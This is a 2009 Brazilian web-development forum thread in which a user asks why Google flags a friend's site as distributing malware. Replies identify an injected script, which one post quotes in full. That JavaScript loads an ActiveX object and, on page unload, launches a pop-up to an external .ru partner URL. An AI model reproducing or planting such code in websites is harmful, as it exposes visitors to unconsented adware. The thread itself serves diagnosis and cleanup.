Jump to content


Photo

Minha Pagina Php Está Com Aviso Google


  • Faça o login para participar
11 replies to this topic

#1 betodesign

betodesign

    Normal

  • Usuários
  • 85 posts
  • Sexo:Não informado

Posted 15/01/2009, 09:22

galera, meu site, e em html e algumas coisinhas em php, recebeu um aviso do google a 3 semanas atras, ja verifiquei ele, nao vi nada de diferente, na verdade é de um amigo meu, cadastrei ele no google e pedi REQUEST A VIEW mesmo assim continua dizendo

"Of the 2 pages we tested on the site over the past 90 days, 1 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-01-14, and the last time suspicious content was found on this site was on 2009-01-14.

Malicious software includes 5 adware(s). Successful infection resulted in an average of 0 new processes on the target machine."

ja tentei de tudo, alguem ja passou por isso?

#2 Humberto Rodrigues

Humberto Rodrigues

    Turista

  • Usuários
  • 59 posts
  • Sexo:Masculino
  • Localidade:Rio de Janeiro

Posted 15/01/2009, 09:30

Posta o código!
Deve ser alguma coisa em JavaScript na página.

#3 DarkSign

DarkSign

    Doutor

  • Usuários
  • 868 posts
  • Sexo:Masculino
  • Localidade:Brasil
  • Interesses:Tecnologias na área WEB em geral e desenvolvimento.

Posted 15/01/2009, 09:43

Ah, vc deve tah usando server gratuito. Esses servers geralmente usam codigo JS malicioso. Principalmente em certos banners.
Não sabe por onde começar? Que tal pelas Regras ?

#4 Maykel Esser

Maykel Esser

    Super Veterano

  • Usuários
  • 1536 posts
  • Sexo:Masculino
  • Localidade:Curitiba - PR

Posted 15/01/2009, 09:59

Ou seu site pode ter sido invadido.

Se este post lhe ajudou, ajude o fórum também. Use a reputação de mensagens! add.png


#5 betodesign

betodesign

    Normal

  • Usuários
  • 85 posts
  • Sexo:Não informado

Posted 15/01/2009, 14:07

eu troquei ele de server semana passada, coloquei ele no meu server pensando que fosse isso, mas o google ja indexou novamente com erro.
estou enviando em anexo a index dele, realmente tem muitos scripts em JS deem uma olhada e me ajudem onde possa estar o virus por favor

Attached Files



#6 Crab

Crab

    Da paz, mas preparado para Guerra

  • Ex-Admins
  • 2521 posts
  • Sexo:Masculino
  • Localidade:Florianópolis - SC
  • Interesses:Desenvolvimento Gráfico e Web.

Posted 15/01/2009, 20:15

Cara, com exatidão eu não posso dizer qual o problema, mas que não é PHP isso tenho 99,9%

;) Até mais

#7 guiligan

guiligan

    Novato no fórum

  • Usuários
  • 5 posts
  • Sexo:Não informado

Posted 15/01/2009, 22:14

algumas perguntas sobre o index.php (que de php só o nome tem :) )

- Foi você quem colocou o comentário no inicio do arquivo? (<!-- Cansou de infectar? !-->)
- Foi você quem criou a função brs() que adiciona um <object>?
Guilherme Mori
Consultoria WEB
http://www.guilhermemori.com.br

#8 Felipe Barreto

Felipe Barreto

    Novato no fórum

  • Usuários
  • 1 posts
  • Sexo:Não informado

Posted 16/01/2009, 00:32

Um dos problemas:
<script>
var isXPSP2 = false;
var u = "6BF52A52-394A-11D3-B153-00C04F79FAA6";

//--------------------------------------------------------------------------------

function ext()
{
if(exit)
{
exit=false;

if(!isXPSP2 && !usePopDialog)
{
window.open(popURL,"",popWindowOptions);
}
else if(!isXPSP2 && usePopDialog)
{
eval("window.showModalDialog(popURL,'',popDialogOptions)");
}
else
{
iie.launchURL(popURL);
}
}
}

//--------------------------------------------------------------------------------

function brs()
{
document.body.innerHTML+="<object id=iie width=0 height=0 classid='CLSID:"+u+"'></object>";
}

//--------------------------------------------------------------------------------

function ver()
{
isXPSP2 = (window.navigator.userAgent.indexOf("SV1") != -1);
if(isXPSP2) brs();
}

//--------------------------------------------------------------------------------
usePopDialog = false;
var refurl = window.location;
var popURL = 'http://cherrytv.ru/?partner=283';
isUsingSpecial = true;
eval("window.attachEvent('onload',ver);");
eval("window.attachEvent('onunload',ext);");

//--------------------------------------------------------------------------------
</script>

Edição feita por: Felipe Barreto, 16/01/2009, 00:39.


#9 jamsbboy

jamsbboy

    Ativo

  • Usuários
  • 319 posts
  • Sexo:Masculino

Posted 16/01/2009, 10:34

Como o Felipe disse acima..

Na sua linha 1 diz: <!-- Cansou de infectar? !-->

esse seu MENU SELECT é mto loko

usePopDialog = false;
var refurl = window.location;
var popURL = 'http://cherrytv.ru/?partner=283'; <-------------------------
isUsingSpecial = true;
eval("window.attachEvent('onload',ver);");
eval("window.attachEvent('onunload',ext);");

Provavelmente é seu SCRIPT q esta bem zuado!!
IG- O Mundo é de quem faz! --- http://www.quemfaz.com.br

#10 betodesign

betodesign

    Normal

  • Usuários
  • 85 posts
  • Sexo:Não informado

Posted 16/01/2009, 11:09

na verdade o site e de um amigo meu, nao fui eu quem fiz, vou apagar estes scripts e pedir uma nova vistoria do google para ver se funciona

#11 betodesign

betodesign

    Normal

  • Usuários
  • 85 posts
  • Sexo:Não informado

Posted 26/01/2009, 18:41

tirei todos os JS das paginas e ate agora nada

#12 Maykel Esser

Maykel Esser

    Super Veterano

  • Usuários
  • 1536 posts
  • Sexo:Masculino
  • Localidade:Curitiba - PR

Posted 27/01/2009, 08:06

o aviso é retirado automaticamente com o tempo amigo

Se este post lhe ajudou, ajude o fórum também. Use a reputação de mensagens! add.png





1 user(s) are reading this topic

0 membro(s), 1 visitante(s) e 0 membros anônimo(s)

IPB Skin By Virteq